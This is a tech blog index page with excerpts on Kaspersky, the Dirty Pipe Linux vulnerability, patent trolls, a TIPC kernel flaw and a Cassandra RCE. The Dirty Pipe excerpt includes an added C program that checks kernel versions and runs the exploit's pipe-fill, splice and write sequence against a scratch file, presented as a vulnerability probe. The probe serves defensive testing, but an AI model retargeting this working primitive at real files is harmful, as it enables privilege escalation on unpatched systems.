Practical Technology

for practical people.

March 18, 2022
by sjvn01
0 comments

Do svidaniya, Kaspersky — goodbye

Companies and governments have, shall we say, interesting relations. Just ask any Chinese tech company in recent days. But while they’re losing billions, companies in war-mongering countries like Russia have an even harder row to hoe. How can Russian companies support Russia’s unprovoked invasion of Ukraine?

You may say they can’t, but that just shows you haven’t studied history. When money and ethics are weighed against each other, money usually wins. For example, such American-as-apple-pie-and-baseball companies as General Motors, Ford, Coca-Cola, and IBM supported Nazi Germany during World War II.

Really. Look it up.

So, there’s nothing too surprising when we see Eugene Kaspersky, founder of the Moscow-based security company Kaspersky, trying to tiptoe his way around Russia’s invasion of Ukraine on Twitter: “We welcome the start of negotiations to resolve the current situation in Ukraine and hope that they will lead to a cessation of hostilities and a compromise.”

Do svidaniya, Kaspersky — goodbye More>

March 8, 2022
by sjvn01
0 comments

Dirty Pipe Is an Awful Linux Mess

As I write this, there’s already a nasty exploit out there using the latest Linux kernel vulnerability, Dirty Pipe, that lets any J. Random Luser overwrite root’s password field in /etc/passwd. The experts at LWN.net called it a “disconcerting kernel vulnerability.” I call it a “shoot me now” security problem.

But let’s not do that, shall we? Here’s the 411 on Dirty Pipe, aka CVE-2022-0847. Web host sysadmin and programmer Max Kellermann first ran into the bug’s symptoms, mysteriously corrupted files, back in 2021, but he wasn’t at first sure what was going on. After a lot of blood, sweat, tears, and research, Kellermann tracked the problem down to a change in how the Linux kernel manages pipe buffers that landed in Linux 5.8. With this update, Kellermann wrote, “it became possible to overwrite data in the page cache, simply by writing new data into the pipe prepared in a special way.” The fix shipped in Linux 5.16.11, 5.15.25, and 5.10.102; any kernel from 5.8 onward without those patches is exposed.

It Gets Worse

OK, that’s bad. But there’s much worse to come. Kellermann found that “To make this vulnerability more interesting, it not only works without write permissions, it also works with immutable files, on read-only btrfs snapshots and on read-only mounts (including CD-ROM mounts). That is because the page cache is always writable (by the kernel), and writing to a pipe never checks any permissions.”

Oh My God.
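To turn the mechanism above into something you can run, here is an added example in C; it is not Kellermann’s code and not from the original post. It does two things: a version triage for the affected range, and a live probe that performs the fill-drain-splice-write sequence from Kellermann’s public write-up against a throwaway file the process itself owns, then reads the file back through the page cache to see whether the written bytes landed there. The fix versions (5.16.11, 5.15.25, 5.10.102) come from that write-up; the temp-file path, the payload, and the use of the raw splice syscall are my own choices.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef __linux__
#include <sys/syscall.h>
#endif

/* Kernel constant F_GETPIPE_SZ (F_LINUX_SPECIFIC_BASE + 8), defined here in
 * case the headers were pulled in without _GNU_SOURCE. */
#ifndef F_GETPIPE_SZ
#define F_GETPIPE_SZ 1032
#endif

/* Version triage. CVE-2022-0847 exists from 5.8 up to the fixes in 5.16.11,
 * 5.15.25 and 5.10.102 (mainline 5.17-rc6). Distributions backport the fix
 * without changing these numbers, so a hit here is a hint, not a verdict;
 * dirty_pipe_probe() below is the authoritative check.
 * Returns 1 if the version falls inside the affected range, else 0. */
int version_in_affected_range(int major, int minor, int patch)
{
    if (major != 5 || minor < 8) return 0;   /* pre-5.8 or 6.x: never had the bug */
    if (minor >= 17) return 0;               /* 5.17-rc6 and later carry the fix */
    if (minor == 16) return patch < 11;
    if (minor == 15) return patch < 25;
    if (minor == 10) return patch < 102;
    return 1;                                /* 5.8, 5.9, 5.11-5.14: affected, EOL, no stable fix */
}

/* Behavioral probe against a scratch file this process owns, following the
 * sequence in Kellermann's public proof of concept: fill and drain a pipe so
 * every freed pipe_buffer keeps a stale PIPE_BUF_FLAG_CAN_MERGE, splice one
 * byte of the file into the pipe, then write into the pipe. On a vulnerable
 * kernel the write merges straight into the file's page-cache page; on a fixed
 * kernel it goes into a fresh buffer and the cached file content is unchanged.
 * Returns 1 = vulnerable, 0 = not vulnerable, -1 = probe could not run. */
int dirty_pipe_probe(void)
{
#ifndef __linux__
    return -1;                               /* pipe splicing is Linux-specific */
#else
    static char filler[4096];
    const char payload[] = "DIRTY";          /* constructed marker bytes */
    const size_t plen = sizeof payload - 1;
    char check[sizeof payload];
    char path[] = "/tmp/dirty_pipe_probe_XXXXXX";   /* assumed writable scratch dir */
    int fd = -1, p[2] = {-1, -1}, pipe_size = 0, result = -1;
    long long off = 0;                       /* loff_t for the splice syscall */

    fd = mkstemp(path);
    if (fd < 0) goto out;
    unlink(path);                            /* private scratch file, gone at exit */
    memset(filler, 'A', sizeof filler);
    if (write(fd, filler, sizeof filler) != (ssize_t)sizeof filler) goto out;

    if (pipe(p)) goto out;
    pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    if (pipe_size <= 0) goto out;

    /* Fill the pipe completely (write() sets CAN_MERGE on each buffer), then
     * drain it; the freed pipe_buffer slots keep their flags. */
    for (int r = pipe_size; r > 0; ) {
        int n = r > (int)sizeof filler ? (int)sizeof filler : r;
        if (write(p[1], filler, n) != n) goto out;
        r -= n;
    }
    for (int r = pipe_size; r > 0; ) {
        int n = r > (int)sizeof filler ? (int)sizeof filler : r;
        if (read(p[0], filler, n) != n) goto out;
        r -= n;
    }

    /* splice() needs at least one byte of the page: take byte 0, so a merged
     * write would land at file offset 1. Raw syscall so this builds even when
     * <fcntl.h> did not expose the splice() prototype. */
    if (syscall(SYS_splice, fd, &off, p[1], (long long *)0, (size_t)1, 0U) != 1) goto out;
    if (write(p[1], payload, plen) != (ssize_t)plen) goto out;

    /* Read the file back through the page cache: did the payload land in it? */
    if (pread(fd, check, plen, 1) != (ssize_t)plen) goto out;
    result = memcmp(check, payload, plen) == 0 ? 1 : 0;
out:
    if (p[0] >= 0) close(p[0]);
    if (p[1] >= 0) close(p[1]);
    if (fd >= 0) close(fd);
    return result;
#endif
}

int main(void)
{
    printf("5.10.101 in affected range: %d\n", version_in_affected_range(5, 10, 101));
    int r = dirty_pipe_probe();
    printf("live probe: %s\n", r == 1 ? "VULNERABLE" : r == 0 ? "not vulnerable" : "probe unavailable");
    return 0;
}
```

Run it as an unprivileged user: the probe only touches the page cache of its own unlinked temporary file, so it is safe on a vulnerable box, and a patched kernel reports “not vulnerable”. Treat the version check as triage only; a distro kernel can carry the backported fix under an older version number, which is exactly why the live probe is there.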

Dirty Pipe Is an Awful Linux Mess. More>

March 7, 2022
by sjvn01
0 comments

Open Source Zone grinds away at patent trolls

Patent trolls, aka Patent Assertion Entities (PAEs), have plagued open-source software for ages. Over the years, though, other groups have risen up to keep them from shaking down the companies and organizations that actually build and use the patented intellectual property (IP). One such group, Unified Patents, an international organization of over 200 businesses, has been winning for the last two years. This is their story to date.

Open Source Zone grinds away at patent trolls More>

February 21, 2022
by sjvn01
0 comments

Nasty Linux Kernel Stack Overflow Flaw Found and Patched

Here we go again. Another obnoxious security bug, CVE-2022-0435, a remote stack overflow in the Linux kernel, was found by Appgate senior exploit developer Samuel Page while he was poking around at a Linux heap overflow bug, CVE-2021-43267, from November 2021. Page’s discovery is a remotely and locally reachable stack overflow in the Linux kernel’s Transparent Inter-Process Communication (TIPC) protocol networking module. The remote path only matters on systems that have the TIPC module loaded and a bearer configured, which mainstream distributions don’t do by default, so checking lsmod for tipc is the first thing to do.

Nasty Linux Kernel Stack Overflow Flaw Found and Patched. More>

February 18, 2022
by sjvn01
0 comments

JFrog Finds RCE Issue in Apache Cassandra

It’s always something when it comes to security. This time around, JFrog’s Security Research team has found a remote code execution (RCE) issue in Apache Cassandra, the popular open source NoSQL database. And, oh joy, of course with this RCE an attacker can also stop Cassandra in its tracks. Since companies such as Netflix, Twitter, Reddit, and hundreds of others rely on Cassandra running every moment of the day, this is not good news. The hole, CVE-2021-44521, sits in Cassandra’s scripted user-defined functions and only bites when enable_user_defined_functions and enable_scripted_user_defined_functions are both turned on while enable_user_defined_functions_threads is turned off, a non-default combination; the fix is in 3.0.26, 3.11.12, and 4.0.2.

JFrog Finds RCE Issue in Apache Cassandra. More>